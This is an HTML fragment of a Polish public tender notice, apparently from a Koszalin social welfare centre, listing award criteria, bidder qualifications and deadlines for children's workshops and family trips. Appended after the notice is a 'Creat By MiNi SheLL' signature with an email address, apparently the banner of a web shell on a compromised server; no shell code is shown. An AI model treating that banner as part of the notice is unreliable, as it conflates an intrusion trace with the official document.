class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koncepcja gry edukacyjnej/terenowej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny – zatrudnienie osób niepełnosprawnych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 3: Zajęcia rozwijające kreatywność i zdrowe nawyki dla dzieci.<br/>Szczegółowy opis przedmiotu zamówienia na Zadanie 3 wraz z dokumentami wymaganymi przy realizacji zamówienia znajduje się w Załączniku nr 7c do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">80000000-4 - Usługi edukacyjne i szkoleniowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-02 do 2023-09-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) Kryterium I - Cena<br/><br/>Oferty oceniane będą na podstawie ceny, podanej przez Wykonawcę w formularzu ofertowym i obliczane według następującego wzoru:<br/>	<br/> P = Cn : Cb x 100 pkt x Wg<br/>gdzie :<br/>- P	- oznacza liczbę punktów przyznanych badanej ofercie<br/>- Cn	- oznacza cenę ofertową brutto oferty najtańszej<br/>- Cb	- oznacza cenę ofertową brutto badanej oferty<br/>- Wg	- oznacza wagę kryterium (w %) = Wg<br/>Wykonawca może uzyskać w tym kryterium maksymalnie 60 punktów.<br/><br/>b) Kryterium II - Znajomość języka ukraińskiego przez osobę prowadzącą warsztaty, skierowaną do realizacji zamówienia<br/><br/>Kryterium „Znajomość języka ukraińskiego przez osobę prowadzącą warsztaty, skierowaną do realizacji zamówienia” będzie rozpatrywane na podstawie oświadczenia Wykonawcy złożonego w formularzu oferty dotyczącego znajomości języka ukraińskiego przez osobę prowadzącą warsztaty, skierowaną do realizacji zamówienia. <br/>Znajomość języka ukraińskiego jest rozumiana jako znajomość tego języka na poziomie umożliwiającym przeprowadzenia warsztatów stanowiących przedmiot zamówienia w języku ukraińskim. Podstawą tej znajomości może być ukończony kurs językowy, sytuacja, gdy język ukraiński jest językiem ojczystym lub inna podstawa umożliwiająca przeprowadzenie warsztatów stanowiących przedmiot zamówienia w języku ukraińskim.<br/>Deklaracja Wykonawcy o znajomości języka ukraińskiego przez osobę prowadzącą warsztaty, skierowaną do realizacji zamówienia będzie oznaczała, że:<br/>a) jeżeli pojedynczy warsztat będzie prowadzony jednocześnie przez więcej niż 1 osobę znajomość języka ukraińskiego będzie posiadać przynajmniej jedna z nich,<br/>b) jeżeli każdy z 3 warsztatów w ramach zadania będzie prowadzony przez inną/inne osoby to każdorazowo będzie spełnione zobowiązanie z punktu a).<br/><br/>W tym kryterium można uzyskać maksymalnie 30 punktów.<br/><br/>Liczba punktów w tym kryterium zostanie przyznana w następujący sposób:<br/>- jeżeli Wykonawca zadeklaruje znajomość języka ukraińskiego przez osobę prowadzącą warsztaty, skierowaną do realizacji zamówienia i wskaże podstawę znajomości języka ukraińskiego – 30 punktów,<br/>- brak zadeklarowania znajomości języka ukraińskiego przez osobę prowadzącą warsztaty, skierowaną do realizacji zamówienia - 0 punktów.<br/><br/>Zamawiający informuje, iż w sytuacji w której Wykonawca nie zaznaczy żadnego z kwadratów lub zaznaczy więcej niż jeden kwadrat w formularzu ofertowym dot. znajomości języka ukraińskiego przez osobę prowadzącą warsztaty, skierowaną do realizacji zamówienia, Zamawiający do oceny oferty, przyjmie, że Wykonawca przy wykonywaniu zamówienia nie zadeklarował znajomości języka ukraińskiego przez osobę prowadzącą warsztaty, skierowaną do realizacji zamówienia a w Kryterium „Znajomość języka ukraińskiego przez osobę prowadzącą warsztaty, skierowaną do realizacji zamówienia” otrzyma 0 punktów.<br/><br/>Jeżeli Wykonawca uzyska punkty w kryterium „Znajomość języka ukraińskiego przez osobę prowadzącą warsztaty, skierowaną do realizacji zamówienia”, osoba ta, z zastrzeżeniem zapisów umowy, zobowiązana jest uczestniczyć w wykonaniu zamówienia.<br/><br/>c) Kryterium III - Aspekt społeczny – zatrudnienie osób niepełnosprawnych <br/>do realizacji zamówienia<br/><br/>Kryterium „Aspekt społeczny - zatrudnienie osób niepełnosprawnych do realizacji zamówienia” będzie rozpatrywane na podstawie oświadczenia Wykonawcy złożonego w formularzu oferty dotyczącego zatrudnienia osób niepełnosprawnych do realizacji zamówienia. <br/>W tym kryterium można uzyskać maksymalnie 10 punktów.<br/>Liczba punktów w tym kryterium zostanie przyznana w następujący sposób:<br/>- jeżeli zadeklarowana przez Wykonawcę liczba zatrudnionych osób niepełnosprawnych do realizacji zamówienia to co najmniej 1 osoba – 10 punktów,<br/>- brak zadeklarowania zatrudnienia przez Wykonawcę osób niepełnosprawnych do realizacji zamówienia - 0 punktów.<br/><br/>Pozostałe informacje w Rozdziale XIII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Znajomość języka ukraińskiego przez osobę prowadzącą warsztaty, skierowaną do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny – zatrudnienie osób niepełnosprawnych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zadanie 4: Wyjazdy integrujące rodzinę. <br/>Szczegółowy opis przedmiotu zamówienia na Zadanie 4 wraz z dokumentami wymaganymi przy realizacji zamówienia znajduje się w Załączniku nr 7d do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">92000000-1 - Usługi rekreacyjne, kulturalne i sportowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-06-15</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a) Kryterium I - Cena<br/><br/>Oferty oceniane będą na podstawie ceny, podanej przez Wykonawcę w formularzu ofertowym i obliczane według następującego wzoru:<br/>	<br/> P = Cn : Cb x 100 pkt x Wg<br/>gdzie :<br/>- P	- oznacza liczbę punktów przyznanych badanej ofercie<br/>- Cn	- oznacza cenę ofertową brutto oferty najtańszej<br/>- Cb	- oznacza cenę ofertową brutto badanej oferty<br/>- Wg	- oznacza wagę kryterium (w %) = Wg<br/>Wykonawca może uzyskać w tym kryterium maksymalnie 60 punktów.<br/><br/>b) Kryterium II - Zapewnienie zajęć animacyjnych dla dzieci na czas trwania podróży autokarem<br/><br/>Oferty oceniane będą w następujący sposób:<br/>Liczba punktów w tym kryterium zostanie przyznana w następujący sposób:<br/>- jeżeli Wykonawca zadeklaruje zapewnienie zajęć animacyjnych dla dzieci na czas trwania podróży autokarem i przedstawi w formularzu ofertowym co najmniej 4 różne przykłady minimum 15 minutowych zajęć manualnych i/lub wokalnych jakie przeprowadzi w czasie trwania podróży – 30 punktów,<br/>- jeżeli Wykonawca zadeklaruje zapewnienie zajęć animacyjnych dla dzieci na czas trwania podróży autokarem – 0 punktów,<br/><br/>Zajęcia animacyjne dla dzieci są rozumiane przez Zamawiającego jako zabawy manualne i wokalne prowadzone w języku polskim przez co najmniej jedną osobę (inną niż kierowca autokaru), możliwe do przeprowadzenia w warunkach transportu autokarem, z wykorzystaniem materiałów udostępnionych przez Wykonawcę.<br/><br/>Wykonawca może uzyskać w tym kryterium maksymalnie 30 punktów.<br/>Zamawiający informuje, iż w sytuacji w której Wykonawca nie zaznaczy żadnego z kwadratów lub zaznaczy więcej niż jeden kwadrat w formularzu ofertowym dot. zapewnienia zajęć animacyjnych dla dzieci na czas trwania podróży autokarem, Zamawiający do oceny oferty, przyjmie, że Wykonawca do wykonywania zamówienia nie zapewnieni zajęć animacyjnych dla dzieci na czas trwania podróży autokarem i otrzyma 0 punktów.<br/><br/>c) Kryterium III - Aspekt społeczny – zatrudnienie osób niepełnosprawnych <br/>do realizacji zamówienia<br/><br/>Kryterium „Aspekt społeczny - zatrudnienie osób niepełnosprawnych do realizacji zamówienia” będzie rozpatrywane na podstawie oświadczenia Wykonawcy złożonego w formularzu oferty dotyczącego zatrudnienia osób niepełnosprawnych do realizacji zamówienia. <br/>W tym kryterium można uzyskać maksymalnie 10 punktów.<br/>Liczba punktów w tym kryterium zostanie przyznana w następujący sposób:<br/>- jeżeli zadeklarowana przez Wykonawcę liczba zatrudnionych osób niepełnosprawnych do realizacji zamówienia to co najmniej 1 osoba – 10 punktów,<br/>- brak zadeklarowania zatrudnienia przez Wykonawcę osób niepełnosprawnych do realizacji zamówienia - 0 punktów.<br/><br/>Zamawiający informuje, iż w sytuacji w której Wykonawca nie zaznaczy żadnego z kwadratów lub zaznaczy więcej niż jeden kwadrat w formularzu ofertowym dot. zadeklarowanej liczby osób, Zamawiający do oceny oferty, przyjmie, że Wykonawca do realizacji zamówienia nie zatrudni osób niepełnosprawnych a w Kryterium „Aspekt społeczny - zatrudnienie osób niepełnosprawnych do realizacji zamówienia” otrzyma 0 punktów.<br/><br/>Pozostałe informacje w Rozdziale XIII SWZ.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Zapewnienie zajęć animacyjnych dla dzieci na czas trwania podróży autokarem</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">aspekty społeczne, w tym integracja zawodowa i społeczna osób, o których mowa w art. 94 ust. 1 ustawy</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Aspekt społeczny – zatrudnienie osób niepełnosprawnych do realizacji zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.3.11.) Określenie aspektów społecznych, środowiskowych lub innowacyjnych, etykiet lub rachunku kosztów cyklu życia w odniesieniu do kryteriów oceny ofert: </h3> <p class="mb-0">zgodnie z art. 242 ust. 2 ustawy - aspekty społeczne</p> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia może się ubiegać Wykonawca, który spełnia poniżej określone warunki udziału w postępowaniu dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>3) sytuacji ekonomicznej lub finansowej:<br/><br/>Dla Zadania 1: Warsztaty aklimatyzacyjne dla dzieci i młodzieży w formie stacjonarnej i wyjazdowej <br/><br/>Zamawiający uzna, że Wykonawca znajduje się w sytuacji ekonomicznej lub finansowej zapewniającej należyte wykonanie zamówienia, jeżeli Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej <br/>z przedmiotem zamówienia na sumę gwarancyjną nie niższą niż 20.000,00 zł.<br/><br/>W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia ww. warunek Wykonawcy ci mogą spełniać łącznie.<br/><br/>Dla Zadania 2: Gra edukacyjna/terenowa.<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>Dla Zadania 3: Zajęcia rozwijające kreatywność i zdrowe nawyki dla dzieci.<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>Dla Zadania 4: Wyjazdy integrujące rodzinę.<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>4) zdolności technicznej lub zawodowej:<br/><br/>Zadanie 1: Warsztaty aklimatyzacyjne dla dzieci i młodzieży w formie stacjonarnej i wyjazdowej <br/>Zamawiający uzna, że Wykonawca posiada wymagane zdolności techniczne lub zawodowe zapewniające należyte wykonanie zamówienia, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponować na czas realizacji zamówienia minimum 1 osobą skierowaną do realizacji zamówienia, posiadającą kwalifikacje do wykonywania zawodu pedagoga oraz minimum 2 lata doświadczenia zawodowego.<br/><br/>W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia ww. warunek Wykonawcy ci mogą spełniać łącznie. <br/><br/>Dla Zadania 2: Gra edukacyjna/terenowa.<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>Dla Zadania 3: Zajęcia rozwijające kreatywność i zdrowe nawyki dla dzieci.<br/>Zamawiający nie stawia warunku w powyższym zakresie.<br/><br/>Dla Zadania 4: Wyjazdy integrujące rodzinę.<br/>Zamawiający uzna, że Wykonawca posiada wymagane zdolności techniczne lub zawodowe zapewniające należyte wykonanie zamówienia, jeżeli Wykonawca wykaże, że w ciągu ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, to w tym okresie, wykonał lub należycie wykonuje co najmniej trzy usługi polegające na organizacji jednodniowej wycieczki krajowej. <br/>Jeśli Wykonawca na potwierdzenie spełniania warunku wskaże usługę polegającą na organizacji wycieczki dłuższej niż jednodniowa zostanie ona uznana za jedną usługę polegającą na organizacji wycieczki jednodniowej.<br/>Zgodnie z rozporządzeniem Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać Zamawiający od Wykonawcy (Dz. U. z 2020 r. poz. 2415) w celu zapewnienia odpowiedniego poziomu konkurencji w postępowaniu o udzielenie zamówienia publicznego Zamawiający dopuszcza, aby wykaz o którym mowa wyżej, dotyczył usług wykonanych, w przypadku świadczeń okresowych lub ciągłych – również wykonywanych, w okresie dłuższym niż trzy lata przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu. Zamawiający wydłuża okres wykonania zamówienia do 5 lat przed upływem terminu składania ofert.<br/><br/>W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia ww. warunek Wykonawcy ci mogą spełniać łącznie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwości wprowadzenia zmian do zawartej umowy, na podstawie art. 454-455 ustawy oraz projektowanych postanowień umowy.<br/><br/>Ze względu na ograniczenie liczby znaków w Ogłoszeniu o zamówieniu, szczegółowe zapisy dotyczące zmian do umowy opisane zostały Załącznikach nr 6a, 6b, 6c i 6d do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-01 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę w przedmiotowym postępowaniu Wykonawca składa za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Adres elektronicznej skrzynki podawczej ePUAP: /mopskoszalin/SkrytkaESP</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-01 09:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-08-30</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com